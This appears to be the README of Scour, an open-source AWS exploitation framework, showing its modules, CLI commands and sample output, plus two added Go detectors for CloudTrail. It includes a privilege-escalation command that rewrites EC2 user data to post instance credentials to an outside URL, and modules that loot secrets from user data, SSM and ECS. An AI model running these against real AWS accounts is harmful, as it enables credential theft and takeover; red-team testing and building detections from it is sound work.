Scour is a modern, module-based AWS exploitation framework written in golang, designed for red team testing and blue team analysis. Scour contains modern techniques that can be used to attack environments or build detections for defense.
Features
- Command Completion
- Dynamic resource listing
- Command history
- Blue team mode (tags attacks with unique User Agent)
Installation
Scour is written in golang, so it's easy to ship around as a binary.
##Gettable
go get github.com/grines/scour
##Build
go build main.go
For a more detailed and user-friendly set of user instructions, please check out the Wiki’s installation guide. **coming soon
Scour’s Modules
Scour uses a range of modules:
- Operations (2)
- Enumeration (7)
- Privilege Escalation (3)
- Lateral Movement (2)
- Evasion (5)
- Credential Discovery (4)
- Execution (2)
- Persistence (7)
- Exfiltration (1)
Notes
- Scour is supported on all Linux/OSX.
- Scour is Open-Source Software and is distributed with a BSD-3-Clause License.
Getting Started
The first time Scour is launched,
Basic Commands in Scour
token profile <profile_name> <region>
will list the available AWS profiles stored in ~/.aws/credentials.
token AssumeRole <role_name> <region>
will assume a role in the same account or across accounts. ** requires an active session
help module
will return the applicable help information for the specified module. ** help TBD
attack evasion <tactic>
will run the specified module with its default parameters.
Running Scour From The Command Line
scour
will enter cli mode
Not Connected <> token profile apiuser us-east-1
sets the session to use for commands that require one
Connected <apiuser/us-east-1>
actively connected to an AWS profile from (~/.aws/credentials) in (region)
Connected <apiuser/us-east-1> attack enum <attack>
tab completion will list available enumeration tactics
Connected <apiuser/us-east-1> attack privesc <attack>
tab completion will list available privilege escalation tactics
Connected <apiuser/us-east-1> attack lateral <attack>
tab completion will list available lateral tactics
Connected <apiuser/us-east-1> attack evasion <attack>
tab completion will list available evasion tactics
Connected <apiuser/us-east-1> attack creds <attack>
tab completion will list available credential discovery tactics
Connected <apiuser/us-east-1> attack execute <attack>
tab completion will list available execution tactics
Connected <apiuser/us-east-1> attack persist <attack>
tab completion will list available persistence tactics
Connected <apiuser/us-east-1> attack exfil <attack>
tab completion will list available exfiltration tactics
Enumeration
Connected <apiuser/us-east-1> attack enum IAM
IAM discovery
+-------+---------------------+------------------+---------------+--------------+
| USER  | MANAGED POLICIES    | INLINE POLICIES  | GROUPS        | ISPRIVILEGED |
+-------+---------------------+------------------+---------------+--------------+
| admin | AdministratorAccess | AllEKSInlineuser | SecurityAudit | true         |
| EC2   | AmazonEC2FullAccess |                  |               | true         |
+-------+---------------------+------------------+---------------+--------------+
Connected <apiuser/us-east-1> attack enum Roles
Roles discovery
UA Tracking: exec-env/EVSWAyidC4/o18HtFPe1P/role-enum
+-----------------------------+----------------+---------------------------------+--------------+
| ROLE                        | PRINCIPAL TYPE | IDENTITY/SERVICE                | ISPRIVILEGED |
+-----------------------------+----------------+---------------------------------+--------------+
| Amazon_CodeBuild_dW6zqYHT3m | AWS            | [arn:aws:iam::861293084598:root | true         |
|                             |                | codebuild.amazonaws.com]        |              |
| Amazon_CodeBuild_f2DOFPjMHK | Service        | [codebuild.amazonaws.com]       | true         |
| Amazon_CodeBuild_HS59ko7lxn | Service        | [codebuild.amazonaws.com]       | true         |
+-----------------------------+----------------+---------------------------------+--------------+
Connected <apiuser/us-east-1> attack enum EC2
EC2 discovery
UA Tracking: exec-env/EVSWAyidC4/dudqW7y1xb/ec2-enum
+---------------------+-----------------------------------------------------+--------------+----------+---------------+----------------------+--------+---------+--------------+----------+
| INSTANCEID          | INSTANCE PROFILE                                    | VPC          | PUBLICIP | PRIVATEIP     | SECURITY GROUPS      | PORTS  | STATE   | ISPRIVILEGED | ISPUBLIC |
+---------------------+-----------------------------------------------------+--------------+----------+---------------+----------------------+--------+---------+--------------+----------+
| i-0f5604708c0b51429 | None                                                | vpc-7e830c1a | None     | 172.31.53.199 | sg-09fcd28717cf4f512 | 80*    | stopped | false        | true     |
|                     |                                                     |              |          |               |                      | 22*    |         |              |          |
|                     |                                                     |              |          |               |                      | 5000*  |         |              |          |
| i-03657fe3b9decdf51 | arn:aws:iam::861293084598:instance-profile/OrgAdmin | vpc-7e830c1a | None     | 172.31.45.96  | sg-61b1fd07          | All*   | stopped | true         | true     |
|                     |                                                     |              |          |               |                      | 8888*  |         |              |          |
| i-01b265a5fdc45df57 | None                                                | vpc-7e830c1a | None     | 172.31.38.118 | sg-0392f752f9b849d3f | 3389*  | stopped | false        | true     |
| i-0867709d6c0be74d9 | arn:aws:iam::861293084598:instance-profile/OrgAdmin | vpc-7e830c1a | None     | 172.31.39.199 | sg-006543a34d2f70028 | 22*    | stopped | true         | true     |
| i-0d95790b5e7ddff23 | None                                                | vpc-7e830c1a | None     | 172.31.12.57  | sg-e1a50dac          | 33391* | stopped | false        | true     |
+---------------------+-----------------------------------------------------+--------------+----------+---------------+----------------------+--------+---------+--------------+----------+
Connected <apiuser/us-east-1> attack enum S3
S3 discovery
UA Tracking: exec-env/EVSWAyidC4/GDGZaYQOuo/s3-enum
+---------------------------------+-----------+-----------+--------------+-------------+---------------------+-------------+-------------+-----------+
| BUCKET                          | HASPOLICY | ISWEBSITE | ALLOW PUBLIC | PERMISSIONS | ALLOW AUTHENTICATED | PERMISSIONS | REPLICATION | REGION    |
+---------------------------------+-----------+-----------+--------------+-------------+---------------------+-------------+-------------+-----------+
| amazon-conn3d79b01a             | false     | false     | false        |             | false               |             | false       | us-west-2 |
| aws-cloudtrail-logs-98-cb39df0d | true      | false     | false        |             | false               |             | false       |           |
| bullsecu                        | true      | true      | false        |             | false               |             | false       |           |
| connect-6ecad67                 | false     | false     | false        |             | false               |             | false       |           |
| connect-5337c3                  | false     | false     | false        |             | false               |             | false       |           |
| ransom                          | true      | false     | false        |             | false               |             | false       |           |
| red*                            | false     | false     | false        |             | false               |             | false       |           |
| rep-**                          | false     | false     | false        |             | false               |             | false       | us-west-2 |
| terraform*                      | false     | false     | false        |             | false               |             | false       |           |
+---------------------------------+-----------+-----------+--------------+-------------+---------------------+-------------+-------------+-----------+
Connected <apiuser/us-east-1> attack enum Groups
Groups discovery
UA Tracking: exec-env/EVSWAyidC4/jAIKVdESpU/groups-enum
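+-----------------------------------------------+---------------------+--------------+-----------------+--------------+
| GROUP                                         | POLICIES            | ISPRIVILEGED | INLINE POLICIES | ISPRIVILEGED |
+-----------------------------------------------+---------------------+--------------+-----------------+--------------+
| EC2                                           | SecurityAudit       | false        |                 | false        |
| OpsWorks-dac9e9ba-8b3d-4e04-9ad9-d988ca4c0731 |                     | false        |                 | false        |
| TestGroup                                     | AmazonEC2FullAccess | true         |                 | false        |
|                                               | SecurityAudit       |              |                 |              |
+-----------------------------------------------+---------------------+--------------+-----------------+--------------+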
Connected <apiuser/us-east-1> attack enum Network
Network discovery
TBD
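The UA Tracking values printed with each enumeration run above are what Blue team mode gives defenders to search for. As an added example (not part of Scour), this Go program pulls that tag out of CloudTrail records so tagged test activity can be attributed to a run and module. It assumes the tag appears verbatim inside CloudTrail's userAgent field and that both IDs are 10 alphanumeric characters, as in the samples on this page; the names TaggedCalls, Hit and sampleTrail are hypothetical.

```go
package main

import (
	"encoding/json"
	"fmt"
	"regexp"
)

// Assumed tag layout, inferred from the "UA Tracking" lines on this page:
// exec-env/<first ID>/<per-run ID>/<module>, embedded in CloudTrail's userAgent.
var scourTag = regexp.MustCompile(`exec-env/([A-Za-z0-9]{10})/([A-Za-z0-9]{10})/([a-z0-9-]+)`)

// Record holds the CloudTrail fields this check needs.
type Record struct {
	EventName string `json:"eventName"`
	UserAgent string `json:"userAgent"`
}

// Hit is one API call attributed to a tagged run ("Session" is our name for the first ID).
type Hit struct{ Session, Run, Module, EventName string }

// TaggedCalls returns every record whose userAgent carries the tag.
func TaggedCalls(trail []byte) ([]Hit, error) {
	var doc struct{ Records []Record }
	if err := json.Unmarshal(trail, &doc); err != nil {
		return nil, err
	}
	var hits []Hit
	for _, r := range doc.Records {
		if m := scourTag.FindStringSubmatch(r.UserAgent); m != nil {
			hits = append(hits, Hit{m[1], m[2], m[3], r.EventName})
		}
	}
	return hits, nil
}

// Constructed sample, not real CloudTrail output; tag values are copied from this page.
// The last record is an ordinary exec-env value that must not match.
const sampleTrail = `{"Records":[
 {"eventName":"ListRoles","userAgent":"aws-sdk-go/1.38.0 (go1.16; linux; amd64) exec-env/EVSWAyidC4/o18HtFPe1P/role-enum"},
 {"eventName":"DescribeInstances","userAgent":"aws-sdk-go/1.38.0 (go1.16; linux; amd64) exec-env/EVSWAyidC4/dudqW7y1xb/ec2-enum"},
 {"eventName":"ListBuckets","userAgent":"aws-cli/2.2.0 Python/3.8.8 Linux/5.4 exe/x86_64 prompt/off"},
 {"eventName":"ListFunctions","userAgent":"aws-sdk-go/1.38.0 exec-env/AWS_Lambda_go1.x"}]}`

func main() {
	hits, err := TaggedCalls([]byte(sampleTrail))
	fmt.Println(hits, err)
}
```

The tag is only present when Blue team mode is used, so this attributes tagged test runs to their module rather than detecting untagged use.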
Privilege Escalation
Connected <apiuser/us-east-1> attack privesc UserData i-0f5604708c0b51429 http://url.to.capture.post.data
steals metadata credentials from EC2: stops the instance, updates its userdata to post credentials to the supplied URL, then starts the instance (which sends the EC2 token to the URL).
[Sun May 9 06:10:16 2021] INF Stopping Instance i-0f5604708c0b51429 – State: stopped
[Sun May 9 06:10:46 2021] INF Modifying Instance Attribute UserData on i-0f5604708c0b51429
[Sun May 9 06:10:47 2021] INF Starting Instance i-0f5604708c0b51429 – State: pending
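A defender can look for the same stop, user-data change, start chain in CloudTrail. The Go program below is an added example, not part of Scour; it assumes events have already been flattened into a hypothetical Event struct and that the three steps show up as the EC2 API calls StopInstances, ModifyInstanceAttribute (attribute userData) and StartInstances.

```go
package main

import (
	"fmt"
	"time"
)

// Event is a CloudTrail record flattened to the fields used here (hypothetical shape).
type Event struct {
	Time                   time.Time
	Name, InstanceID, Attr string // Attr: attribute named in ModifyInstanceAttribute
}

// UserDataSwaps flags stop -> userData change -> start chains completed within window.
func UserDataSwaps(events []Event, window time.Duration) (flagged []string) {
	stopped := map[string]time.Time{} // instance -> time of its last StopInstances
	swapped := map[string]bool{}      // instance -> userData changed since that stop
	for _, e := range events { // events must be sorted by time
		t0, seen := stopped[e.InstanceID]
		open := seen && e.Time.Sub(t0) <= window // chains older than window are ignored
		switch {
		case e.Name == "StopInstances":
			stopped[e.InstanceID], swapped[e.InstanceID] = e.Time, false
		case e.Name == "ModifyInstanceAttribute" && e.Attr == "userData" && open:
			swapped[e.InstanceID] = true
		case e.Name == "StartInstances":
			if open && swapped[e.InstanceID] {
				flagged = append(flagged, e.InstanceID)
			}
			delete(stopped, e.InstanceID)
		}
	}
	return flagged
}

// sampleEvents is constructed; the first instance mirrors the log lines on this page.
func sampleEvents() []Event {
	at := func(sec int) time.Time { return time.Date(2021, 5, 9, 6, 10, sec, 0, time.UTC) }
	return []Event{
		{at(16), "StopInstances", "i-0f5604708c0b51429", ""},
		{at(20), "StopInstances", "i-0aaaaaaaaaaaaaaaa", ""}, // placeholder ID, benign resize
		{at(30), "ModifyInstanceAttribute", "i-0aaaaaaaaaaaaaaaa", "instanceType"},
		{at(46), "ModifyInstanceAttribute", "i-0f5604708c0b51429", "userData"},
		{at(47), "StartInstances", "i-0f5604708c0b51429", ""},
		{at(59), "StartInstances", "i-0aaaaaaaaaaaaaaaa", ""},
	}
}

func main() { fmt.Println(UserDataSwaps(sampleEvents(), 15*time.Minute)) }
```

A stop/start cycle that only changes another attribute, such as the instance type in the sample, is not flagged.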
Credential Discovery
Connected <apiuser/us-east-1> attack creds UserData
loot credentials from EC2 userdata
UA Tracking: exec-env/yzaqX9HFvP/oL1oho99ZP/userdata-creds
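+---------------------+------------------+-------------------------------------------------------------------------------+
| INSTANCEID          | RULE             | FINDING                                                                       |
+---------------------+------------------+-------------------------------------------------------------------------------+
| i-0f5604708c0b51429 | Slack Webhook    | https://hooks.slack.com/services/T00000000/B00000000/XXXXXXXXXXXXXXXXXXXXXXXX |
| i-0f5604708c0b51429 | Generic Password | password=thisisapassword                                                      |
+---------------------+------------------+-------------------------------------------------------------------------------+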
Connected <apiuser/us-east-1> attack creds SSM
loot credentials from Systems Manager
UA Tracking: exec-env/yzaqX9HFvP/FASongUCcG/ssm-params-creds
+------------+----------+----------------------+
| PARAM NAME | DATATYPE | VALUE                |
+------------+----------+----------------------+
| Test       | text     | thismightbeapassword |
+------------+----------+----------------------+
Connected <apiuser/us-east-1> attack creds ECS
loot credentials from ECS
UA Tracking: exec-env/9tsJFrIPmw/rEGaMfF5AI/ecs-creds
+-------------+-------+------------+
| ENVARS NAME | VALUE | DEFINITION |
+-------------+-------+------------+
| Secret      | heere | sample-app |
+-------------+-------+------------+